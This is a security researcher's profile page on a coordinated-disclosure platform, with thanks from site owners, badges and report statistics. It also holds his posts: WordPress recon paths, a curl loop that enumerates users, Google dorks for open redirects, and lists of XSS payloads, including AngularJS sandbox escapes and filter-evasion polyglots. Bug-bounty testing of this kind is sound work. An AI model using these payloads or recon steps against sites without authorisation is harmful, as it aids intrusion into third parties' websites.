Report a Vulnerability
Submit, help fixing, get kudos.
Start a Bug Bounty
Run your bounty program for free.
544,498 coordinated disclosures
349,735 fixed vulnerabilities
819 bug bounties with 1,599 websites
16,802 researchers, 1136 honor badges

MiguelSantareno | Security Researcher Profile


Security researcher MiguelSantareno has already helped fix 1012 vulnerabilities.



Researcher reputation:  230

Real name:
Miguel Santareno

About me:
Public work and profiles:
http://miguelsantareno.eu

https://hackerone.com/miguel_santareno

https://www.intigriti.com/profile/miguelsantareno

https://bugcrowd.com/MiguelSantareno

https://app.cobalt.io/MiguelSantareno

https://www.exploit-db.com/google-hacking-database author 9699

https://tryhackme.com/p/MiguelSantareno

https://pentesterlab.com/profile/Miguelsantareno

https://www.hackthebox.eu/profile/19625

How to contact me:
[email protected]

Alternative Contacts:
https://twitter.com/MiguelSantareno

https://www.linkedin.com/in/miguelsantareno

Certifications & Diplomas:
MTA Security Essentials
CEH
CPTE
ISO/IEC 27001

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.

Halls of Fame:
Vodafone Portugal NOS Oracle Bosch General Motors Khan Academy Impinj U.S. Dept Of Defense Alibaba CERT-EU Ford Telefnica Germany RATELIMITED
Informatica IBM BMW Overstock's trend micro randstad

Follow me on:
Twitter
LinkedIn

Recommendations and Acknowledgements

    16 March, 2020
     bmpbraga Bruno from Weasy:
Thanks to Miguel that reported a XSS vulnerability in one of our websites.
Excellent service.

The problem is now solved and tested.
Great help, Many thanks
    20 January, 2020
     PaulMar23292621 Martin from A1 Telekom Austria:
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel!
    17 January, 2020
     uniteddomains Lubos from united-domains AG:
Miguel helped us to identify several bugs in our wordpress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much!
    2 January, 2020
     NeneLand Lorenzo Zotano from Giants Gaming:
Miguel found a important security issue in our webpage and send us very good information about solutions. Thanks a lot.
    30 December, 2019
     FeroxHosting Luc from Ferox Hosting:
Miguel found a issue in our wordpress site and was quick to report it. Thank you
    17 July, 2018
     DragonSGA Stefan from Cadenas:
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
    15 May, 2018
     Lewisdh47 Dave from Avis:
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
    9 May, 2018
     bubblegate James Murrells from Bubblegate:
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
    26 September, 2017
     pmiguelr75 Pedro Rodrigues from Bluesoft:
Identified an XSS vulnerability in one website and show us where is it.
After that made changes in code to solve it
All solved.
Great help, great support.
    22 September, 2017
     thenrique Tulio from Spirit Fanfics:
dentified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:1403
Total reports on VIP sites:97
Total patched vulnerabilities:1012
Total vulnerabilities on Hold (Open Bug Bounty):2
Recommendations received:19
Active since:20.06.2017

Open Bug Bounty Certificate



05.09.2019  Wordpress basic auditing

Wordpress Read me
target/readme.html

Wordpress License with wordpress version
target/license.txt

Wordpress sample config:
target/wp-config-sample.php

Wordpress installation:
target/wp-admin/install.php

Wordpress upgrade file:
target/wp-admin/upgrade.php

Wordpress setup config:
target/wp-admin/setup-config.php

Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt

05.09.2019  Payloads for all type off web attacks

02.04.2019  Google Dorks to find open redirects:

inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https

02.04.2019  Cross Site Script angular payloads:

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

30.03.2019  List off basic Cross site script playloads

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

Reported Vulnerabilities

All Submissions VIP Submissions

Domain Reported Status Type
11.05.2020
On Hold
Improper Access Control 
11.05.2020
On Hold
Open Redirect
18.04.2020
patched
Cross Site Scripting
15.03.2020
patched
Cross Site Scripting
10.02.2020
unpatched
Improper Access Control 
10.02.2020
patched
Improper Access Control 
07.02.2020
unpatched
Improper Access Control 
24.01.2020
unpatched
Improper Access Control 
15.01.2020
unpatched
Improper Access Control 
14.01.2020
unpatched
Improper Access Control 
09.01.2020
unpatched
Improper Access Control 
07.01.2020
unpatched
Improper Access Control 
04.01.2020
unpatched
Improper Access Control 
04.01.2020
unpatched
Improper Access Control 
04.01.2020
unpatched
Improper Access Control 
04.01.2020
unpatched
Improper Access Control 
04.01.2020
unpatched
Improper Access Control 
04.01.2020
patched
Improper Access Control 
02.01.2020
unpatched
Improper Access Control 
27.12.2019
unpatched
Improper Access Control 

  Latest Patched

 15.07.2020 t3n.de
 14.07.2020 milb.com
 14.07.2020 rawabi.ps
 13.07.2020 valuecoders.com
 13.07.2020 gamemeca.com
 13.07.2020 jumkak.com
 13.07.2020 tingroom.com
 13.07.2020 conjugacao.com.br
 13.07.2020 biphim.tv
 13.07.2020 app.ptuk.edu.ps

  Latest Blog Posts

24.06.2020 by Gkexamquiz
How to Find Contacts To Report Bugs &amp; Security Vulnerabilities | Bug Bounty Tutorials 2020
24.06.2020 by 0xcrypto
Improper Access Control - Generic: Unrestricted access to any "connected pack" on docs in coda.io
04.04.2020 by Rando02355205
(Alibaba) message.alibaba.com [IDOR] - [Bug Bounty]
12.03.2020 by Rando02355205
(Paypal) www.paypal.com [CSP High Level] - [XSS Reflected] - [Bug Bounty] - [Write Up]
08.03.2020 by CybeReports
JDECO.net XSS Vulnerability| CybeReports

  Recent Recommendations

    14 July, 2020
     tnyaritm:
Many thanks for your efforts to report the vulnerability and helped us to fix it. I recommend this researcher!
    13 July, 2020
     SFgenealogy:
Appreciate your discovery and notification of a bug so that we can increase our security!
    10 July, 2020
     Cajun_Lyrics:
Thank you very much for letting me know about the vulnerabilities on my website, It is really appreciated!
    10 July, 2020
     SNTech2:
A big thanks for notifying us of the bug! Much appreciated.
    10 July, 2020
     SNTech2:
A big thanks for notifying us of the bug! Much appreciated.